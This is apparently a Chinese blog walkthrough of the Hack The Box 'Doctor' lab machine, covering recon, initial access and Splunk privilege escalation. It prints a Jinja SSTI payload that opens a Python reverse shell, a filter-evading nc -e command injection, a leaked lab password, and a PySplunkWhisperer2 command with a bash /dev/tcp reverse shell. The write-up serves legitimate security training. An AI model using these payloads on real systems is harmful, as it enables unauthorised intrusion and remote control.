zoukankan      html  css  js  c++  java
  • HTB::Doctor

    标签:SSTIsplunk

    实验环境

    HTBDoctor1

    渗透过程

    0x01 信息搜集

    masscan

    masscan 10.10.10.209 -p0-65535 --rate 1000
    Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-02-19 01:41:14 GMT
     -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
    Initiating SYN Stealth Scan
    Scanning 1 hosts [65536 ports/host]
    Discovered open port 22/tcp on 10.10.10.209
    Discovered open port 8089/tcp on 10.10.10.209
    Discovered open port 80/tcp on 10.10.10.209
    

    nmap

    nmap -sC -sV -p22,80,8089 10.10.10.209
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-19 09:46 CST
    Nmap scan report for 10.10.10.209
    Host is up (0.36s latency).
    
    PORT     STATE SERVICE  VERSION
    22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
    |   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
    |_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
    80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Doctor
    8089/tcp open  ssl/http Splunkd httpd
    | http-robots.txt: 1 disallowed entry
    |_/
    |_http-server-header: Splunkd
    |_http-title: splunkd
    | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
    | Not valid before: 2020-09-06T15:57:27
    |_Not valid after:  2023-09-06T15:57:27
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 70.70 seconds
    

    开放了22(SSH)、80(HTTP)和8089(splunkd)端口。

    访问80端口,发现是一个简单的展示页面,该页面中存在邮箱信息,添加进入hosts:

    doctors.htb

    访问后得到新页面:

    HTBDocker3

    使用目录扫描:

    gobuster dir -w ~/Wordlists/SecLists/Discovery/Web-Content/common.txt -u http://doctors.htb -t 100
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://doctors.htb
    [+] Threads:        100
    [+] Wordlist:       /root/Wordlists/SecLists/Discovery/Web-Content/common.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2021/02/19 10:17:44 Starting gobuster
    ===============================================================
    /account (Status: 302)
    /archive (Status: 200)
    /home (Status: 302)
    /login (Status: 200)
    /logout (Status: 302)
    /register (Status: 200)
    /server-status (Status: 403)
    ===============================================================
    2021/02/19 10:18:12 Finished
    ===============================================================
    

    针对登录框进行SQL万能密码测试无果。

    查看网页源代码时发现HTML中存在注释信息:

    HTBDocker4

    访问后发现为空页面。

    0x02 开干

    反弹shell

    方法一:SSTI

    查看网站信息:

    HTBDocker7

    使用Python建的站,新建New Massage,验证是否存在SSTI:

    HTBDocker5

    测试SSTI过程:

    HTBDocker16

    经过测试发现可以进行命令执行:

    HTBDocker6

    进行反弹shell:

    {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.22",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash", "-i"]);'").read().zfill(417)}}{%endif%}{% endfor %}
    

    成功:

    HTBDocker8

    方法二:curl

    输入url发现可以进行请求:

    HTBDocker9

    Payload:

    http://10.10.14.22/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.22'$IFS'4444')
    

    HTBDocker12

    shaun

    在服务器/var/log/apache2/backup中发现修改密码过程

    HTBDocker10.png

    切换到shaun用户:

    成功得到user:

    HTBDocker11

    提权:

    使用上面得到的用户名密码,成功登录:

    HTBDocker13

    查找Splunk 8.0.5相关提权信息,得到脚本:

    HTBDocker14

    使用脚本提权:

    python .PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.22 --username shaun --password Guitar123 --payload "bash -c 'exec bash -i &>/dev/tcp/10.10.14.22/4445 <&1'"
    

    接收到反弹SHELL,获得root.txt:

    HTBDocker15

    Reference

    Doctor - HackTheBox

    Doctor: HackTheBox Walkthrough

  • 相关阅读:
    js和jquery 两种写法 鼠标经过图片切换背景效果
    phpStudy如何修改端口及WWW目录
    模仿淘宝上传图片之后在图片中单击按钮?
    资源汇总
    标题类型-整型
    VB6 内存释放
    在Textbox中按回车键后继续获取焦点
    ADO 读写文本文件
    VBA 拷贝文件
    VBA 获取文件夹内的文件列表
  • 原文地址:https://www.cnblogs.com/chalan630/p/14422291.html
Copyright © 2011-2022 走看看